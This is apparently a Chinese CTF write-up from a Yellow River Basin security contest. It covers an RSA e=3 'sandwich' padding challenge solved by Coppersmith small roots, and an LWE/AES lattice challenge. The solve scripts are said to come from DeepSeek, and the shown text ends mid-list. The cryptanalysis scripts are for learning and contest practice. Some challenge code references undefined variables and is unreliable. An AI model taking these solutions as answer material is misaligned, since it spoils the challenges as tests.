第三届黄河流域网络安全技能挑战赛

sandwitch

三明治攻击,把题目和名字都给DeepSeek,并且LLM指导进行爆破得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from Crypto.Util.number import *
import gmpy2
flag = b'flag{fake_flag}'
assert len(flag) == 39
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 0x3
pad1 = b'easy_problem'
pad2 = b'How_to_solve_it'
c = pow(bytes_to_long(pad1 + flag + pad2),e,n)
print(f'n = {n}')
print(f'c = {c}')

'''
n = 130210658110511504736422597261591182174531847806532340762131145212035478695205314931974421838392310731226415266775095601890938846830080329061111533796518633011922277343217149648494987341818402753017296362015915834670450122261511337212801488239810623226740266516836721952886027130703886460578247562781194524199
c = 58274335440051115211211273605191310114692293785750437685473044454042062899661976407492451518086227780147882738264722645944582899451063113444881286175099872016956825274378613983870549046907444680021237171113596116147511706486372974792692071549068969896395366667516390709069131700584308236332248449116109156503
'''

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from sage.all import *
from Crypto.Util.number import bytes_to_long, long_to_bytes

n = 130210658110511504736422597261591182174531847806532340762131145212035478695205314931974421838392310731226415266775095601890938846830080329061111533796518633011922277343217149648494987341818402753017296362015915834670450122261511337212801488239810623226740266516836721952886027130703886460578247562781194524199
c = 58274335440051115211211273605191310114692293785750437685473044454042062899661976407492451518086227780147882738264722645944582899451063113444881286175099872016956825274378613983870549046907444680021237171113596116147511706486372974792692071549068969896395366667516390709069131700584308236332248449116109156503

pad1 = b'easy_problem' # 12字节
pad2 = b'How_to_solve_it' # 15字节

A = bytes_to_long(pad1)
B = bytes_to_long(pad2)

# ------------------ 关键验证点 -------------------
# 1. 确认填充长度
assert len(pad1) == 12 and len(pad2) == 15, "填充长度错误"

# 2. 计算位移
total_shift_pad1 = (39 + len(pad2)) * 8 # (39+15)*8=432位
shift_flag = len(pad2) * 8 # 15*8=120位
assert total_shift_pad1 == 432 and shift_flag == 120, "位移计算错误"

# 3. 构造多项式
P.<x> = PolynomialRing(Zmod(n))
M = A * (2 ** total_shift_pad1) + x * (2 ** shift_flag) + B
f = (M**3 - c).monic()

# 4. 自动化参数遍历
success = False
for m in [3, 4, 5, 6]: # 遍历不同格维度
for beta in [0.4, 0.45, 0.5]: # 不同beta值
for epsilon in [0.01, 0.02, 0.05]: # 不同epsilon
print(f"\n尝试参数: m={m}, beta={beta}, epsilon={epsilon}")
roots = f.small_roots(X=2**(39*8), beta=beta, epsilon=epsilon, m=m)
if roots:
flag = long_to_bytes(int(roots[0]))
print(f"[+] 成功恢复Flag: {flag}")
success = True
break
else:
print(f"[-] 当前参数组合未找到根")
if success: break
if success: break

if not success:
print("\n[!] 所有参数组合均失败,请检查:")
print(" 1. 填充结构是否与题目完全一致")
print(" 2. 确认n和c的值正确")
print(" 3. 尝试更高性能设备运行(增大m需要更多内存)")

1

1

Lattice

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from Crypto.Util.number import *
from Crypto.Cipher import AES
import os
from secret import flag
import numpy as np


def gen(q, n, N, sigma):
t = np.random.randint(0, high=q // 2, size=n)
s = np.concatenate([np.ones(1, dtype=np.int32), t])
A = np.random.randint(0, high=q // 2, size=(N, n))
e = np.round(np.random.randn(N) * sigma**2).astype(np.int32) % q
b = ((np.dot(A, t) + e).reshape(-1, 1)) % q
P = np.hstack([b, -A])
return P, s


def enc(P, M, q):
N = P.shape[0]
n = len(M)
r = np.random.randint(0, 2, (n, N))
Z = np.zeros((n, P.shape[1]), dtype=np.int32)
Z[:, 0] = 1
C = np.zeros((n, P.shape[1]), dtype=np.int32)
for i in range(n):
C[i] = (np.dot(P.T, r[i]) + (np.floor(q / 2) * Z[i] * M[i])) % q
return C


q = 127
n = 3
N = int(1.1 * n * np.log(q))
sigma = 1.0

P, s = gen(q, n, N, sigma)


def prep(s):
return np.array([int(b) for char in s for b in f"{ord(char):08b}"], dtype=np.int32)


C = enc(P, prep(hint), q)
P = P.tolist()
C = C.tolist()
print(f"{P=}")
print(f"{C=}")

'''
P=[[87, -27, -52, -29], [57, -41, -24, -60], [76, -17, -55, -37], [75, -46, -33, -21], [121, -55, -33, -34], [47, -4, -34, -45], [112, -33, -44, -16], [74, -44, -5, -25], [20, -21, -16, -49], [89, -21, -54, -24], [18, -23, -53, -1], [35, -40, -4, -29], [105, -54, -2, -8], [44, -24, -43, -36], [111, -15, -15, -54]]
C=[[24, 75, 81, 85], [24, 14, 85, 102], [115, 1, 5, 21], [58, 118, 104, 77], [65, 42, 101, 103], [33, 38, 50, 67], [7, 81, 38, 58], [117, 101, 54, 11], [44, 29, 81, 8], [59, 114, 70, 121], [62, 13, 9, 105], [11, 43, 97, 23], [39, 82, 75, 97], [122, 113, 14, 30], [70, 102, 116, 5], [58, 44, 61, 20], [73, 119, 59, 28], [119, 68, 57, 122], [61, 91, 83, 44], [103, 29, 1, 73], [47, 60, 120, 125], [17, 126, 14, 21], [104, 8, 78, 123], [72, 121, 54, 74], [48, 104, 49, 66], [72, 56, 27, 69], [34, 110, 41, 54], [33, 54, 74, 44], [70, 65, 11, 113], [122, 3, 69, 35], [58, 7, 39, 64], [59, 106, 49, 66], [77, 92, 87, 92], [95, 21, 96, 83], [67, 55, 30, 73], [99, 54, 18, 90], [101, 102, 126, 107], [81, 46, 104, 83], [38, 24, 94, 60], [114, 105, 76, 97], [22, 115, 20, 67], [40, 72, 110, 65], [111, 92, 106, 117], [5, 123, 21, 96], [41, 14, 23, 114], [113, 75, 43, 65], [56, 3, 61, 48], [40, 101, 16, 114], [42, 84, 95, 13], [36, 110, 91, 107], [4, 13, 60, 74], [24, 80, 125, 76], [123, 26, 27, 119], [31, 87, 6, 123], [61, 106, 73, 120], [66, 10, 36, 65], [91, 38, 46, 9], [121, 20, 106, 48], [123, 21, 78, 27], [22, 74, 55, 110], [47, 49, 118, 76], [30, 10, 16, 118], [43, 19, 52, 61], [100, 9, 37, 35], [20, 102, 111, 94], [116, 63, 55, 43], [13, 110, 42, 14], [46, 65, 71, 28], [82, 5, 76, 74], [86, 34, 117, 84], [28, 44, 82, 50], [76, 79, 77, 11], [68, 39, 51, 89], [83, 93, 95, 2], [54, 108, 101, 82], [99, 90, 122, 37], [16, 92, 79, 12], [67, 86, 24, 36], [80, 94, 106, 59], [50, 56, 95, 98], [33, 68, 89, 40], [74, 124, 14, 82], [88, 93, 54, 93], [51, 17, 124, 31], [17, 17, 45, 35], [113, 71, 76, 44], [48, 6, 120, 4], [36, 91, 108, 11], [2, 41, 58, 72], [42, 59, 51, 81], [73, 22, 79, 27], [85, 35, 29, 98], [76, 76, 37, 22], [82, 29, 42, 27], [75, 114, 37, 106], [40, 69, 53, 73], [39, 44, 33, 121], [94, 85, 92, 54], [91, 77, 124, 46], [108, 31, 101, 84], [35, 33, 97, 45], [99, 32, 17, 14], [1, 66, 11, 35], [78, 100, 95, 81], [73, 49, 14, 37], [70, 9, 107, 2], [84, 98, 92, 62], [123, 87, 87, 110], [3, 81, 111, 28], [20, 2, 91, 37], [93, 101, 77, 93], [27, 16, 31, 105], [95, 81, 87, 17], [10, 103, 21, 102], [81, 57, 118, 82], [15, 92, 60, 71], [16, 84, 126, 49], [35, 26, 2, 120], [70, 86, 45, 9], [29, 8, 40, 66], [99, 77, 14, 9], [12, 70, 50, 52], [21, 21, 85, 54], [91, 94, 100, 85], [9, 42, 47, 14], [117, 55, 17, 99], [53, 45, 4, 72], [49, 10, 27, 121], [108, 61, 73, 42], [121, 42, 41, 71], [49, 63, 50, 117], [5, 78, 24, 101], [0, 117, 21, 46], [90, 43, 47, 32], [74, 85, 118, 84], [13, 73, 18, 66], [95, 24, 120, 18], [94, 21, 111, 34], [66, 68, 80, 21], [102, 49, 57, 55], [25, 85, 107, 98], [8, 18, 88, 12], [18, 6, 86, 82], [18, 91, 126, 115], [26, 11, 30, 35], [88, 78, 76, 74], [51, 75, 76, 15], [60, 24, 72, 27], [91, 72, 44, 104], [84, 113, 39, 116], [41, 83, 91, 74], [84, 17, 94, 119], [46, 95, 85, 5], [109, 58, 71, 42], [126, 29, 114, 73], [27, 70, 7, 125], [121, 66, 97, 111], [8, 21, 10, 57], [15, 62, 65, 8], [101, 79, 32, 74], [69, 42, 38, 58], [65, 81, 72, 16], [20, 81, 1, 126], [91, 111, 69, 33], [56, 84, 65, 66], [47, 78, 43, 100], [43, 90, 80, 25], [46, 55, 10, 60], [116, 110, 49, 116], [72, 115, 38, 104], [79, 43, 74, 106], [86, 113, 84, 76], [102, 2, 119, 3], [126, 25, 83, 44], [37, 83, 46, 40], [13, 75, 101, 101], [76, 93, 3, 63], [69, 9, 84, 37], [103, 47, 106, 80], [72, 104, 85, 19], [124, 118, 34, 81], [57, 25, 52, 119], [44, 56, 63, 90], [123, 46, 124, 31], [19, 116, 23, 77], [126, 78, 37, 93], [34, 95, 43, 98], [37, 90, 32, 97], [106, 8, 80, 8], [90, 5, 113, 68], [99, 40, 39, 18], [90, 37, 48, 45], [56, 13, 76, 6], [68, 33, 52, 102], [62, 45, 29, 123], [100, 21, 73, 92], [92, 18, 118, 23], [84, 86, 42, 83], [107, 8, 71, 52], [114, 106, 78, 85], [10, 120, 115, 119], [27, 49, 124, 16], [65, 40, 48, 37], [69, 42, 8, 29], [35, 39, 55, 102], [58, 19, 41, 75], [17, 2, 113, 12], [8, 34, 72, 75], [91, 32, 19, 52], [62, 50, 109, 78], [9, 115, 35, 50], [42, 83, 78, 41], [34, 94, 97, 58], [56, 73, 25, 115], [55, 12, 16, 86], [97, 95, 30, 92], [47, 105, 70, 68], [50, 18, 51, 23], [46, 57, 80, 29], [4, 66, 123, 24], [55, 53, 26, 36], [71, 59, 104, 91], [94, 3, 1, 34], [57, 8, 85, 102], [89, 73, 115, 25], [13, 38, 81, 76], [104, 30, 81, 104], [55, 101, 95, 101], [69, 65, 5, 11], [123, 105, 84, 125], [38, 110, 4, 28], [112, 115, 92, 71], [90, 120, 112, 39], [50, 18, 107, 71], [95, 63, 118, 93], [93, 111, 59, 55], [17, 15, 2, 88], [78, 126, 37, 12], [56, 112, 53, 12], [65, 34, 82, 100], [9, 94, 72, 99], [78, 76, 43, 91], [7, 88, 107, 31], [43, 91, 97, 4], [113, 112, 36, 15], [8, 97, 23, 84], [65, 92, 31, 63], [54, 38, 119, 103], [89, 50, 57, 50], [61, 37, 87, 0], [21, 35, 44, 22], [20, 32, 95, 116], [10, 94, 103, 84], [59, 29, 7, 50], [98, 33, 87, 33], [7, 96, 36, 67], [85, 10, 35, 98], [65, 49, 19, 62], [56, 67, 14, 91], [30, 49, 111, 77], [121, 49, 108, 119], [89, 67, 115, 69], [65, 8, 0, 82], [117, 57, 117, 23], [23, 38, 2, 98], [60, 28, 94, 93], [23, 65, 8, 114], [121, 105, 122, 40], [120, 12, 21, 112], [55, 51, 2, 77], [48, 41, 113, 62], [66, 82, 117, 119], [4, 15, 5, 21], [41, 14, 12, 80], [23, 61, 106, 16], [23, 53, 122, 68], [6, 54, 5, 101], [69, 49, 7, 79], [17, 70, 64, 88], [103, 30, 76, 31], [108, 82, 90, 109], [55, 56, 113, 37], [93, 99, 126, 44], [1, 46, 105, 124], [55, 54, 35, 115], [0, 89, 53, 97], [67, 111, 107, 80], [92, 122, 40, 64], [75, 2, 126, 118], [90, 84, 43, 74], [101, 69, 60, 17], [104, 10, 4, 122], [94, 4, 115, 91], [15, 11, 111, 105], [9, 7, 32, 101], [77, 18, 55, 56], [66, 7, 117, 108], [116, 121, 33, 66], [32, 41, 83, 125], [60, 52, 70, 58], [125, 54, 93, 15], [70, 19, 10, 58], [83, 94, 61, 126], [95, 85, 80, 44], [25, 89, 117, 74], [12, 17, 63, 87], [118, 80, 96, 26], [6, 97, 79, 38], [97, 3, 107, 95], [7, 82, 106, 92], [83, 100, 119, 95], [81, 26, 99, 56], [25, 60, 51, 122], [56, 18, 22, 84], [9, 72, 107, 114], [80, 97, 92, 52], [108, 47, 58, 46], [9, 47, 7, 47], [115, 68, 91, 7], [14, 120, 87, 122], [97, 15, 40, 79], [5, 92, 85, 93], [4, 97, 73, 63], [25, 22, 92, 108], [88, 4, 34, 86], [0, 43, 21, 57], [67, 90, 36, 50], [15, 126, 37, 12], [92, 73, 96, 71], [76, 107, 27, 115], [79, 8, 68, 55], [38, 12, 120, 126], [54, 46, 7, 69], [72, 114, 93, 60], [59, 98, 27, 102], [50, 76, 87, 19], [77, 107, 29, 40], [36, 73, 21, 123], [36, 89, 82, 74], [24, 73, 118, 86], [58, 89, 115, 106], [12, 27, 33, 72], [28, 94, 21, 26], [0, 79, 48, 110], [72, 62, 82, 57], [65, 84, 114, 97], [80, 68, 52, 52], [119, 35, 103, 101], [10, 67, 68, 69], [101, 17, 54, 40], [98, 46, 21, 42], [30, 39, 56, 118], [27, 33, 77, 114], [66, 74, 61, 63], [23, 13, 14, 47], [88, 30, 122, 119], [15, 58, 55, 52], [56, 27, 47, 45], [119, 95, 59, 14], [84, 69, 5, 83], [21, 35, 39, 36], [10, 92, 68, 17], [79, 67, 111, 38], [36, 1, 4, 117], [117, 30, 5, 7], [112, 15, 115, 123], [54, 47, 18, 93], [102, 111, 3, 68], [91, 91, 5, 44], [123, 118, 57, 32], [12, 121, 31, 103], [114, 52, 105, 12], [100, 28, 117, 102], [51, 42, 12, 124], [47, 1, 42, 47], [28, 3, 22, 100], [103, 105, 119, 24], [101, 59, 13, 78], [79, 36, 61, 54], [11, 46, 75, 116], [31, 73, 118, 0], [92, 32, 0, 124], [77, 85, 25, 90], [29, 21, 74, 7], [3, 66, 11, 8], [112, 91, 50, 53], [45, 113, 99, 123], [35, 65, 85, 22], [108, 99, 42, 1], [103, 113, 116, 72], [125, 74, 112, 24], [75, 79, 80, 12], [83, 44, 94, 86], [64, 20, 0, 8], [104, 126, 31, 120], [85, 75, 61, 74], [36, 93, 36, 102], [70, 54, 101, 83], [90, 46, 109, 83], [112, 126, 114, 23], [16, 123, 97, 62], [118, 86, 108, 53], [99, 18, 2, 18], [103, 3, 38, 8], [99, 49, 123, 81], [37, 75, 89, 53], [34, 77, 27, 122], [29, 8, 40, 66], [119, 13, 64, 83], [4, 108, 116, 121], [49, 87, 1, 92], [15, 63, 80, 62], [27, 81, 100, 83], [7, 90, 16, 0], [13, 50, 61, 65], [51, 64, 76, 5], [55, 100, 106, 66], [52, 102, 105, 2], [49, 34, 89, 116], [24, 55, 11, 27], [91, 48, 73, 38], [27, 5, 1, 126], [66, 55, 80, 19], [52, 118, 104, 43], [36, 1, 111, 60], [65, 4, 34, 17], [54, 22, 0, 39], [52, 30, 64, 62], [26, 40, 32, 86], [93, 71, 41, 47], [77, 23, 15, 9], [11, 20, 51, 31], [64, 50, 37, 50], [17, 49, 80, 37], [119, 115, 115, 50], [20, 86, 27, 5], [101, 65, 17, 78], [56, 25, 125, 56], [16, 118, 2, 96], [114, 108, 69, 121], [14, 37, 76, 101], [113, 124, 121, 82], [43, 120, 35, 94], [82, 67, 23, 43], [9, 79, 47, 122], [39, 28, 110, 31], [35, 48, 27, 16], [72, 8, 115, 66], [54, 46, 122, 19], [77, 77, 30, 74], [58, 63, 81, 96], [6, 122, 75, 63], [115, 31, 119, 110], [82, 86, 89, 1], [79, 100, 6, 110], [117, 67, 15, 13], [4, 15, 63, 0], [106, 108, 122, 107], [34, 72, 0, 114], [20, 0, 32, 56], [121, 104, 66, 3], [86, 28, 76, 84], [85, 9, 60, 45], [95, 80, 78, 65], [39, 85, 50, 49], [42, 103, 36, 90], [70, 99, 116, 117], [34, 15, 40, 52], [24, 49, 19, 31], [98, 90, 95, 89], [63, 45, 40, 77], [114, 14, 30, 106], [10, 35, 116, 9], [103, 111, 112, 16], [71, 112, 71, 32], [77, 31, 105, 64], [84, 87, 24, 67], [1, 27, 123, 57], [104, 29, 87, 123], [110, 39, 67, 7], [28, 70, 108, 113], [96, 9, 101, 36], [13, 28, 6, 13], [69, 81, 89, 26], [79, 113, 77, 91], [112, 62, 104, 117], [109, 95, 55, 83], [78, 68, 98, 14], [73, 79, 96, 12], [108, 39, 97, 49], [27, 111, 106, 100], [82, 70, 9, 36], [48, 31, 90, 70], [99, 92, 45, 35], [55, 100, 31, 37], [75, 17, 69, 35], [12, 38, 119, 112], [103, 34, 63, 76], [26, 19, 91, 111], [74, 122, 12, 78], [64, 117, 16, 60], [2, 97, 122, 106], [62, 79, 56, 30], [71, 47, 13, 22], [38, 78, 116, 16], [87, 28, 94, 76], [77, 126, 94, 116], [83, 46, 104, 90], [5, 95, 13, 26], [47, 10, 46, 115], [82, 19, 91, 70], [111, 72, 49, 65], [18, 103, 59, 72], [17, 37, 56, 24], [19, 120, 24, 64], [28, 40, 11, 20], [18, 19, 80, 62], [37, 11, 74, 14], [109, 97, 75, 72], [116, 65, 52, 121], [95, 63, 82, 122], [88, 93, 54, 93], [77, 30, 65, 121], [99, 121, 42, 87], [62, 52, 44, 6], [79, 60, 55, 4], [96, 64, 6, 20], [94, 114, 90, 8], [123, 98, 29, 27], [116, 84, 31, 80], [9, 77, 45, 45], [120, 33, 63, 15], [51, 44, 66, 25], [2, 46, 72, 94], [107, 113, 50, 46], [115, 64, 126, 85], [64, 10, 28, 78], [84, 112, 64, 103], [59, 114, 15, 82], [65, 122, 104, 89], [113, 122, 21, 11], [69, 106, 19, 78], [42, 93, 125, 0], [7, 123, 82, 70], [103, 114, 62, 92], [15, 30, 78, 114], [4, 78, 111, 60], [40, 80, 34, 55], [3, 87, 120, 27], [122, 64, 3, 122], [24, 49, 31, 81], [26, 43, 100, 19], [52, 78, 2, 97], [116, 45, 15, 33], [21, 119, 92, 86], [28, 118, 71, 24], [106, 15, 0, 79], [36, 4, 52, 73], [22, 43, 8, 60], [96, 22, 9, 100], [19, 64, 26, 96], [97, 61, 22, 39], [6, 112, 76, 38], [58, 6, 97, 94], [103, 87, 87, 101], [17, 49, 80, 37], [117, 33, 26, 8], [59, 108, 78, 91], [113, 28, 30, 44], [119, 78, 72, 20], [49, 101, 77, 2], [26, 18, 35, 7], [34, 38, 99, 37], [45, 52, 90, 27], [108, 31, 118, 67], [3, 37, 29, 88], [111, 96, 12, 111], [91, 111, 106, 100], [52, 78, 117, 80], [14, 51, 87, 0], [1, 52, 116, 1], [117, 2, 33, 48], [57, 0, 48, 34], [59, 14, 84, 63], [82, 83, 8, 82], [58, 100, 32, 33], [75, 29, 112, 103], [0, 49, 45, 54], [94, 9, 51, 110], [54, 61, 27, 47], [88, 89, 23, 37], [73, 43, 0, 32], [123, 6, 35, 78], [73, 72, 119, 64], [81, 46, 11, 102], [42, 124, 47, 8], [50, 66, 3, 40], [116, 7, 51, 20], [47, 112, 99, 7], [42, 37, 86, 89], [18, 74, 78, 101], [57, 85, 75, 7], [26, 90, 35, 10], [72, 126, 10, 77], [55, 12, 5, 78], [37, 87, 85, 96], [91, 9, 114, 68], [79, 76, 44, 20], [84, 52, 63, 56], [95, 9, 22, 117], [96, 38, 50, 67], [43, 114, 45, 56], [94, 21, 74, 107], [92, 82, 81, 71], [40, 10, 10, 90], [20, 18, 15, 56], [72, 2, 30, 22], [50, 31, 123, 20], [85, 40, 115, 115], [93, 1, 48, 47], [111, 118, 45, 34], [9, 122, 37, 121], [60, 27, 77, 41], [122, 38, 22, 39], [115, 66, 74, 126], [77, 67, 90, 78], [96, 3, 53, 52], [5, 26, 120, 101], [45, 100, 72, 6], [106, 56, 87, 77], [52, 68, 102, 95], [1, 13, 36, 33], [58, 27, 35, 8], [52, 5, 38, 35], [102, 82, 63, 47], [24, 71, 119, 43], [11, 36, 90, 13], [11, 93, 27, 23], [4, 107, 26, 125], [85, 9, 5, 13], [116, 25, 55, 119], [73, 82, 73, 2], [40, 123, 77, 41], [10, 98, 51, 111], [23, 79, 120, 54], [56, 18, 22, 84], [61, 115, 51, 109], [33, 5, 12, 121], [8, 81, 35, 70], [22, 39, 103, 2], [38, 74, 66, 126], [83, 20, 117, 85], [8, 32, 91, 98], [37, 31, 94, 119], [7, 30, 45, 43], [68, 16, 124, 97], [86, 124, 37, 21], [29, 101, 15, 30], [27, 31, 52, 45], [47, 37, 102, 3], [117, 49, 54, 89], [48, 94, 126, 66], [42, 115, 63, 104], [14, 74, 6, 112], [68, 125, 4, 5], [66, 3, 78, 52], [108, 33, 6, 77], [77, 99, 16, 52], [61, 78, 73, 70], [108, 106, 124, 0], [23, 35, 119, 118], [125, 124, 37, 65], [69, 30, 61, 110], [77, 10, 120, 118], [53, 121, 24, 30], [87, 32, 29, 63], [54, 64, 1, 3], [16, 59, 104, 25], [30, 6, 59, 102], [43, 120, 35, 94], [89, 13, 69, 39], [87, 78, 100, 14], [83, 17, 14, 4], [24, 49, 31, 81], [73, 32, 72, 10], [0, 22, 61, 54], [81, 42, 70, 13], [108, 56, 52, 2], [25, 99, 116, 72], [66, 23, 18, 102], [121, 115, 47, 12], [96, 37, 123, 48], [64, 69, 4, 39], [78, 38, 124, 31], [27, 69, 10, 70], [5, 29, 2, 85], [30, 45, 56, 7], [31, 25, 120, 61], [36, 89, 89, 118], [98, 63, 18, 21], [121, 83, 36, 57], [60, 5, 86, 17], [121, 55, 117, 58], [12, 96, 4, 27], [119, 63, 124, 37], [96, 27, 45, 91], [42, 119, 8, 103], [104, 42, 68, 37], [104, 55, 41, 38], [120, 3, 50, 87], [120, 121, 20, 67], [58, 123, 50, 28], [103, 62, 58, 20], [97, 27, 89, 102], [7, 51, 56, 108], [73, 60, 10, 77], [56, 72, 103, 69], [101, 89, 18, 66], [115, 35, 80, 36], [98, 103, 39, 63], [29, 126, 67, 76], [27, 97, 15, 79], [36, 6, 17, 90], [126, 54, 101, 42], [115, 66, 74, 126], [78, 80, 62, 83], [60, 11, 31, 88], [16, 73, 108, 13]]
'''

key = os.urandom(16)
encrypted = AES.new(key=key, iv=iv, mode=AES.MODE_CBC).encrypt(b"".join([pad(i.encode(), 16) for i in flag]))

print(leak)
print(key)
print(encrypted)

'''
-3.257518803980229925210589904230583482986646342139415561576950148286382674434770529248486501793457710730252401258721482142654716015216299244487794967600132597049154513815052213387666360825101667524635777006510550117512116441539852315185793280311905620746025669520152068447372368293640072502196959919309286241
b'\x8fj\x94\x98-\x1fd\xd5\x89\xbe\xa9*Tu\x90\xb7'
b'\x9fT@\xbc\x82\x8esQ\x1e\xd8\x1d\xdb\x9b\xb4\xf8rU\xc8\xa0\xcb\xaf H\xa9.\x04\x1e\xd2\x92\x1f\x0fBja-\x965x\xa8@\xc9x\xf9\xaf\x87\xd1\xa5}\xfc\x1b\xe0#\xc3m\xc9\x8973\x1c\x1f\x13\x8f\xb2a\xae\xa9]\xb9\xc2\xe8\x83A\x80\x13g\xc9a\x1c<\x8a\x9c&\xd9\xbd\x06\xef\xba9\xb0\x03\x9f\x022\xc9\x13\x9a\xffXPG\xc6o\xc0\xeaV7)XG9L\x84N7U\xe3Wn0G\x8e\xd3\x04(\n\x08\xb9\x17\xe6\xf1\xaa\xb7\x8a@$\x16\x13\x06A\x00\xc9Z\xdf\x7fQ\xc9\x08\xb4\xf3P\xfcpe\xe2\xeb\x96\x0e(-\xde\x17\xd1\x01\x1c_\x82\x8b\x9fw\xc8\x86\xfbw\xb5\xf7\xd0\xc8\x1784\xe3?\x00\x0b.)\xb7\xbc\x8e{\xe0\xae\x8d$\x0f\x19\'\xb6\xee@d\x00\xd9\x84\x8c\x0e\xa3,\xc6a\xa3\xba*1\xfd<\xfd\x18\xd6\x9e\x8c4\x8e#\xfd\xbd&0R\xeddE,\xed\xb6\x1e\x00\x11\xa6K\xd3\x1dT\x8c5\x8e\x00\xea\x10\xe9\'u"B#\xa1#\xd8\xe3\xf5j\xbc\x94M\xda\xe3\xcb*\xf0W1\xa0\x80\x1d\xfc\xbfo\x01?(da\r\xb6\x86\xd0\x90\x88Z\xa1`B\x89\x89\x89\xb3v\xa5\xf0\xe0\x0c\x8e\xcc+P\xfc\xfd#\x83\xe9\x93\x96\n\xf2\xa5\xfb\xc3\xc5\xaa\x9e\x89\x93\xb6\xf5\xea\x8c%NY\xc3\x0eR\xfas\xa1\x13\xf2/*\xce\x8b_:_r\xeb\xbe\x0b\x8a\x8c\x97\x7f|m}\xae\xa9I\x95\xcc\xe7\x80\xa5yC4\x1f5\xa4P\xc5\xbf.\xf9V\xe8|\xbb\xc3\xcb\x98&\'JB\x99\x94\xc0\r$\x0b\xbe48u\xeb\xca\xa1\xfbb\xd8_R\x97\x8e\xaeI\xfc\xc2\xb2\xd2#@\xec\x16\xf1\xd7eCQ\x1cO\x13\xca\xb5\xd3\x1a\xb1\xf1_D\x80\x06\xa5\xbe\xbev\xbd\xd6\xbb\x9a\xc9x\x9cf:\xcb>\xa2\xe1\xcad\xde]aw\xa0\xdc\xb2\xb3{+\x85\x8d\x8b\xc5\rT\xcc\xd9X\xd5\x9b\r<\x99m\xb8b6s\xbfp\x0eo~\xe9&\xb2{\xbe\xee\x93\xd2N1\\\x94\x968IWO7\xcb\xb6e\x80\xf7\x9air\xb2~\x17\x1cF\x0f\x82T]RBX\xdex\x13\x85\xfa\xcd-\xce\xdc\xe4\xe5^\x99u\xb5\x01\xd0-\xc3C\xcd\xc4y6\xb7\x9d|L1\xe74\xf7\x8cH\xe9\xa9\xfav\n\xec;\xf2\xa2w\xfb\x13_b\r)z!\xa3\xc8\xa8\xc2\xd2\x10\x00\x11\x11\r\xb2&\xfb\x04&\x84">x6l[\x06n>\xa0\xbe\x9c`\xa7\x9e\xe0\xfb\x85\x91\xc4,\xcf\xac\xe11@a\xed3@\xfd}\x8e\xfaTp\xcb7\xe7\xbf\xd4\xe0~b\xd9\xe0<\xba\x81\xd4"e\xfc\x939|j#0H\x86\xf8\x0b\x03\xd2\xe8\xf5\xe55\xdc\xc8\x06\\\xb7)\xcc\x9b\'\xf12'
'''

让DeepSeek做

1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import numpy as np
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# Given data
P = [[87, -27, -52, -29], [57, -41, -24, -60], [76, -17, -55, -37], [75, -46, -33, -21], [121, -55, -33, -34], [47, -4, -34, -45], [112, -33, -44, -16], [74, -44, -5, -25], [20, -21, -16, -49], [89, -21, -54, -24], [18, -23, -53, -1], [35, -40, -4, -29], [105, -54, -2, -8], [44, -24, -43, -36], [111, -15, -15, -54]]
C = [[24, 75, 81, 85], [24, 14, 85, 102], [115, 1, 5, 21], [58, 118, 104, 77], [65, 42, 101, 103], [33, 38, 50, 67], [7, 81, 38, 58], [117, 101, 54, 11], [44, 29, 81, 8], [59, 114, 70, 121], [62, 13, 9, 105], [11, 43, 97, 23], [39, 82, 75, 97], [122, 113, 14, 30], [70, 102, 116, 5], [58, 44, 61, 20], [73, 119, 59, 28], [119, 68, 57, 122], [61, 91, 83, 44], [103, 29, 1, 73], [47, 60, 120, 125], [17, 126, 14, 21], [104, 8, 78, 123], [72, 121, 54, 74], [48, 104, 49, 66], [72, 56, 27, 69], [34, 110, 41, 54], [33, 54, 74, 44], [70, 65, 11, 113], [122, 3, 69, 35], [58, 7, 39, 64], [59, 106, 49, 66], [77, 92, 87, 92], [95, 21, 96, 83], [67, 55, 30, 73], [99, 54, 18, 90], [101, 102, 126, 107], [81, 46, 104, 83], [38, 24, 94, 60], [114, 105, 76, 97], [22, 115, 20, 67], [40, 72, 110, 65], [111, 92, 106, 117], [5, 123, 21, 96], [41, 14, 23, 114], [113, 75, 43, 65], [56, 3, 61, 48], [40, 101, 16, 114], [42, 84, 95, 13], [36, 110, 91, 107], [4, 13, 60, 74], [24, 80, 125, 76], [123, 26, 27, 119], [31, 87, 6, 123], [61, 106, 73, 120], [66, 10, 36, 65], [91, 38, 46, 9], [121, 20, 106, 48], [123, 21, 78, 27], [22, 74, 55, 110], [47, 49, 118, 76], [30, 10, 16, 118], [43, 19, 52, 61], [100, 9, 37, 35], [20, 102, 111, 94], [116, 63, 55, 43], [13, 110, 42, 14], [46, 65, 71, 28], [82, 5, 76, 74], [86, 34, 117, 84], [28, 44, 82, 50], [76, 79, 77, 11], [68, 39, 51, 89], [83, 93, 95, 2], [54, 108, 101, 82], [99, 90, 122, 37], [16, 92, 79, 12], [67, 86, 24, 36], [80, 94, 106, 59], [50, 56, 95, 98], [33, 68, 89, 40], [74, 124, 14, 82], [88, 93, 54, 93], [51, 17, 124, 31], [17, 17, 45, 35], [113, 71, 76, 44], [48, 6, 120, 4], [36, 91, 108, 11], [2, 41, 58, 72], [42, 59, 51, 81], [73, 22, 79, 27], [85, 35, 29, 98], [76, 76, 37, 22], [82, 29, 42, 27], [75, 114, 37, 106], [40, 69, 53, 73], [39, 44, 33, 121], [94, 85, 92, 54], [91, 77, 124, 46], [108, 31, 101, 84], [35, 33, 97, 45], [99, 32, 17, 14], [1, 66, 11, 35], [78, 100, 95, 81], [73, 49, 14, 37], [70, 9, 107, 2], [84, 98, 92, 62], [123, 87, 87, 110], [3, 81, 111, 28], [20, 2, 91, 37], [93, 101, 77, 93], [27, 16, 31, 105], [95, 81, 87, 17], [10, 103, 21, 102], [81, 57, 118, 82], [15, 92, 60, 71], [16, 84, 126, 49], [35, 26, 2, 120], [70, 86, 45, 9], [29, 8, 40, 66], [99, 77, 14, 9], [12, 70, 50, 52], [21, 21, 85, 54], [91, 